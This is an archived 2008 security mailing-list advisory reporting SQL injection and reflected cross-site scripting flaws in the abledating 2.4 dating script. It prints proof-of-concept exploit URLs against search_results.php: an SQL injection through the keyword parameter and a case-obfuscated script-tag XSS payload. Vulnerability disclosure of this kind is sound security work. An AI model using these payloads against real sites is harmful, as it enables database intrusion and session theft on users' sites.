abledating 2.4 >> Sql injection and cross site scripting on search_results.php

From: a.jasbi@xxxxxxxxx
Date: 22 May 2008 17:00:00 -0000

By : Ali Jasbi ( hackerz.ir security & hacking team)
vendor : abk-soft.com
product name : abledating 2.4
Exploits :
1- Sql injection :
bug :
http://abledating//search_results.php?p_age_from=18&p_age_to=18&keyword=[sql injection]&status=online&save_search=on&search_name=My%20search&photo=on&p_orientation%255B%255D=2&order=rating&sort=desc&p_relation%255B%255D=4&search
test :
http://abledating/search_results.php?p_age_from=18&p_age_to=18&keyword=%00'&status=online&save_search=on&search_name=My%20search&photo=on&p_orientation%255B%255D=2&order=rating&sort=desc&p_relation%255B%255D=4&search
2-Cross site scripting :
bug :
http://abledating/search_results.php?p_orientation%5B%5D=2&p_age_from=18&p_age_to=18&p_relation%5B%5D=on&keyword=>'><ScRiPt%20%0a%0d>alert(42119.7535489005)%3B</ScRiPt>&status=online&save_search=on&search_name=My%20search&photo=on

Prev by Date: IRM Security Advisory : Barracuda Networks Spam Firewall Cross-Site Scripting Vulnerability
Next by Date: [SECURITY] [DSA 1586-1] New xine-lib packages fix several vulnerabilities
Previous by thread: IRM Security Advisory : Barracuda Networks Spam Firewall Cross-Site Scripting Vulnerability
Next by thread: [SECURITY] [DSA 1586-1] New xine-lib packages fix several vulnerabilities
Index(es):
- Date
- Thread

Relevant Pages

Re: Reading local files in Netscape 6 and Mozilla (GM#001-NS)
... >bugzilla entry on bugzilla.mozilla.org which is the best place for bug ... This inconsistency can make it difficult for vulnerability reporters ... to contact the vendor, and some reporters feel forced to publicly ...
(NT-Bugtraq)
[VulnWatch] RE: [VulnDiscuss] new IE bug (confirmed on ALL windows)
... choose to work with a vendor. ... VulnWatch has never attempted to impose any type of disclosure policy on ... VulnWatch will gladly help any researcher or casual IT Security ... before anyone has offered to pay you "beer money" for a bug. ...
(VulnWatch)
Re: Complicated Disclosure Scenario
... Forward your vuln-dev letter to them, informing them of your dilemma; ... I say give them one last chance or else post the advisory; ... Initially the bug presented itself as a way to ... > I informed this vendor, who is by no means short on resources, that I ...
(Vuln-Dev)
RE: Complicated Disclosure Scenario
... Vendor stonewalling is the reason full disclosure got started, ... Subject: Complicated Disclosure Scenario ... basically, if they refuse to acknowledge the bug, and the bug exists in a ...
(Vuln-Dev)
Re: Complicated Disclosure Scenario
... either A) they put you on pay roll and you fix all ... Initially the bug presented itself as a way to ... > before they began creating an advisory or even working on a patch. ... > I informed this vendor, who is by no means short on resources, that I ...
(Vuln-Dev)